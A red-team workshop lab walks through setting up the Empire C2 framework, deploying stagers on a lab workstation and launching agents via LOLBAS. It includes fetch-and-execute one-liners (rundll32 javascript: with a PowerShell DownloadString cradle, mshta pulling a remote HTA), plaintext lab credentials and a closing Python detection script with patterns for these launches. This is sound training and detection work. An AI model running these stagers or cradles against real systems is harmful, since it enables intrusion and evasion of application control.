Lab 2: Empire Setup and Initial Agent
Last updated
In this lab we will:
spin up Empire
connect to the Starkiller graphical user interface
create a listener
create a variety of stagers
RDP into our entrypoint system
execute a variety of stagers
interact with an agent and perform some situational awareness
Make sure that you are connected to the VPN using the OpenVPN configuration file (student.ovpn) that was created when you deployed the lab environment.
sudo openvpn student.ovpn
Your VPN connection should print something along the lines of "Initialization sequence completed". It is of crucial importance to NOT terminate this terminal session.
Now that you are connected to the VPN, take note of the IP address of your tun0 adapter (it should be in the 10.8.0.0/24 range, typically 10.8.0.2). You can find the IP by opening a new terminal tab or window and typing
ip addr show dev tun0
In this terminal window (or a separate one, if you are forgetful about your IP), you can start your Empire server. Much like the VPN connection, this terminal session needs to remain active and should NOT be closed. You can start your Empire server by typing the following (you might need to change directories using the "cd" command to your Empire location, such as /opt/Empire/):
sudo ./ps-empire server
Eventually you should see something along the lines of
Open a web browser and browse to the following URL: http://localhost:1337/index.html#/ . You will be greeted by the Starkiller interface 😄
You can log in to Starkiller using the following credentials: Username: empireadmin Password: password123
Once logged on, you are conveniently dropped on the listener page. Please create a new listener by clicking on the orange create button on the top right.
Although you could create an HTTPS listener in Empire, for this workshop we will be going with plain HTTP instead to reduce overhead. We cover HTTPS listeners in SEC565 🥁. When you click the create button, a new window appears asking which type of listener you want; go ahead and select "http" from the dropdown list.
A new window appears allowing you to specify all kinds of details for your listener. Give your listener an appropriate name such as workshop-http-listener.
In the Host field, replace the IP address with the IP address of your tun0 interface.
Although port 80 would be appropriate, you might already have something running on that port, so we will be picking port 8000 for this workshop.
After inserting all these values, press the orange submit button on the top right.
After creating a listener, we need a payload associated with it. This is typically called a "stager". In Starkiller you have two ways to create a stager: either from the listener in Starkiller or from the sidebar. We will be using the sidebar approach.
When you click on the stager button a new window will open; at the top you will see a new orange create button. Click it.
In the dropdown, you have a variety of cool options to weaponize a payload. For now, we will be sticking to the multi/launcher.
Give the launcher an appropriate name such as workshop-launcher
Select the listener you created from the dropdown list (you should only have one option).
Press the orange submit button on the top right.
In a real engagement you obviously need to get initial access through social engineering or exploitation. In this workshop we assume breach and are provided regular domain user credentials.
Some green buttons will be added to your top navigation after you click submit. We will be needing those in a moment 👍. First, open a new terminal tab or window and RDP into the entry point of our environment using xfreerdp. If xfreerdp is not installed on your system yet, you can install it by opening a terminal window and typing
sudo apt install freerdp2-x11 -y
xfreerdp /v:10.0.10.20 /u:jross /p:'0nz2xQ44GumoWpl' +clipboard
Back in your Empire web UI, go ahead and click the green paperclip button to copy the stager to your clipboard. Open up PowerShell in your RDP session, right-click in the PowerShell prompt to paste your stager, and press Enter to execute it.
In Starkiller you should now see a new agent after you navigate to the chainlink icon on the left-hand side; click on the agent name to interact with it.
We can now interact with our agent and execute shell commands or run the post-exploitation tasks bundled with Empire. A nice task to run is some situational awareness, like checking for any interesting processes using a third-party tool called "Seatbelt" (ironically, our Empire stager should be the only interesting process that gets returned). In the agent interaction window, click on the dropdown and type seat; a suggestion will pop up showing the built-in seatbelt module. Click it.
After clicking on the suggested seatbelt module, some new options appear, along with a warning that this module is not OPSEC safe due to how Empire deals with C#. We get a new dropdown with the command that we want to execute. We could go for -group=all, but that takes a while to execute (feel free to do so though, just be patient while Seatbelt is doing its thing). For this particular exercise we'll stick to InterestingProcesses instead. After selecting it, click the submit button.
Navigate to the tasks tab to see the output of your previously executed task. Click on the dropdown button to see the output results.
A familiar process seems to be executing ... 😄
If you have time left, we can also launch some additional agents using a technique popular with adversaries: Living off the Land Binaries and Scripts (LOLBAS). These binaries are present on the system by default and often carry a Microsoft signature, which means they are likely to bypass controls such as application control (AppLocker / WDAC, for instance).
Open up a new terminal window and create a staging directory. Do not close the terminal window; we need it in a second.
mkdir staging
cd staging
In Empire, navigate back to your stagers, click on the three dots, and then choose copy to clipboard.
Back in your terminal window, use your favorite text editor (nano!) to create a new file called stager.ps1. For this workshop (and not to break the internet), I will be using gedit.
gedit stager.ps1
Copy and paste your stager into the new document and save it.
Back in your terminal window, start a Python web server on port 6666 (for evil!). Again, do not close the terminal window, as we need to keep the staging server alive.
python3 -m http.server 6666
Back in your RDP session to workstation01 (see step 18 if you closed your RDP session), open a command prompt (NOT PowerShell). We will be using rundll32 (a crowd favorite) to pull our stager and launch another Empire agent. In the cmd window, type the following hackerman command:
Replace the <REPLACE BY YOUR TUN 0 ADAPTER IP > placeholder in the command with the actual IP address of your tun0 interface!
rundll32.exe javascript:"..\mshtml.dll,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://<REPLACE BY YOUR TUN 0 ADAPTER IP >:6666/stager.ps1');")
Upon success, you will see a new hit on your Python server and a new agent in Empire!
For our final trick of this lab, let's create a new stager in HTA format. Click on the stager (suitcase) icon on the left-hand side and click the orange create button.
Select windows_hta from the dropdown, give it a name and select your listener from the dropdown and click submit.
Click the paperclip icon again to copy the payload to your clipboard.
Navigate to the terminal where you are running the Python server and stop it by pressing Ctrl+C.
Let's create a new file and call it totallylegit.hta
gedit totallylegit.hta
Copy your HTA payload into the file and save it.
Start your Python server again:
python3 -m http.server 6666
In your RDP session, invoke the following command from the cmd prompt (replace 10.8.0.2 with your own tun0 IP address if it differs):
mshta http://10.8.0.2:6666/totallylegit.hta
A new hit should appear in your Python web server terminal window and a new Empire agent will check in!
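The two LOLBAS launches above (rundll32 with the javascript: protocol handler and mshta fetching a remote .hta) are exactly the kind of process-creation events a blue team looks for. As an added example, not part of the original lab or of Empire, the following Python script scans a handful of constructed process-creation records (modelled loosely on the fields a Sysmon Event ID 1 or EDR telemetry entry carries) for the command-line patterns used in this lab. The sample events, rule names and the scan_events() helper are all assumptions made for this illustration; the IP and port come from the lab text.

```python
import re

# Constructed sample process-creation records for this example (hypothetical
# telemetry, not captured from the lab environment). The first, second and
# fourth mirror the lab commands; the third and fifth are benign lookalikes.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\rundll32.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": 'rundll32.exe javascript:"..\\mshtml.dll,RunHTMLApplication ";'
                'document.write();new%20ActiveXObject("WScript.Shell").Run('
                '"powershell -nop -exec bypass -c IEX (New-Object Net.WebClient)'
                ".DownloadString('http://10.8.0.2:6666/stager.ps1');\")"},
    {"image": r"C:\Windows\System32\mshta.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "mshta http://10.8.0.2:6666/totallylegit.hta"},
    {"image": r"C:\Windows\System32\rundll32.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": "rundll32.exe shell32.dll,Control_RunDLL"},      # legitimate use
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "powershell -nop -exec bypass -c IEX (New-Object Net.WebClient)"
                ".DownloadString('http://10.8.0.2:6666/stager.ps1')"},
    {"image": r"C:\Windows\System32\mshta.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"mshta C:\Program Files\Vendor\setup.hta"},     # local HTA, not flagged here
]

# Detection rules: (rule name, compiled regex over the command line, severity).
# rundll32 abusing the javascript: handler and mshta pulling a remote URL are
# the two LOLBAS launches shown in the lab; the PowerShell rules catch the
# download cradle embedded in them.
RULES = [
    ("rundll32_javascript_protocol",
     re.compile(r"rundll32(\.exe)?\s+javascript:", re.I), "high"),
    ("mshta_remote_url",
     re.compile(r"mshta(\.exe)?\s+(https?|ftp)://", re.I), "high"),
    ("powershell_download_cradle",
     re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient", re.I), "medium"),
    ("powershell_exec_bypass",
     re.compile(r"-(exec(utionpolicy)?|ep)\s+bypass", re.I), "medium"),
]

URL_RE = re.compile(r"https?://[^\s'\")]+", re.I)
SEVERITY_RANK = {"medium": 1, "high": 2}


def scan_event(event):
    """Return a finding dict for one process-creation event, or None if no rule fires."""
    cmdline = event["cmdline"]
    matched = [name for name, rx, _ in RULES if rx.search(cmdline)]
    if not matched:
        return None
    # Overall severity is the highest severity among the rules that fired.
    severity = max((sev for name, _, sev in RULES if name in matched),
                   key=SEVERITY_RANK.__getitem__)
    url = URL_RE.search(cmdline)
    return {
        "image": event["image"],
        "parent": event["parent"],
        "rules": matched,
        "severity": severity,
        # The staging URL is the pivot for a responder: which host served the payload.
        "url": url.group(0) if url else None,
    }


def scan_events(events):
    """Scan a list of events and return findings in input order (benign events are dropped)."""
    return [f for f in (scan_event(e) for e in events) if f is not None]


if __name__ == "__main__":
    for finding in scan_events(SAMPLE_EVENTS):
        print(f"[{finding['severity']}] {finding['image']} (parent {finding['parent']})")
        print(f"    rules: {', '.join(finding['rules'])}")
        print(f"    staging url: {finding['url']}")
```

Run stand-alone, the script flags the rundll32, mshta and bare PowerShell launches while leaving the Control Panel rundll32 call and the local HTA untouched. In a real deployment the same logic belongs in a SIEM rule or Sigma signature keyed on the process-creation command line, with the extracted staging URL feeding a blocklist or a hunt for other hosts that contacted it.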
This concludes our lab, feel free to keep messing around if you still have time left! 🎉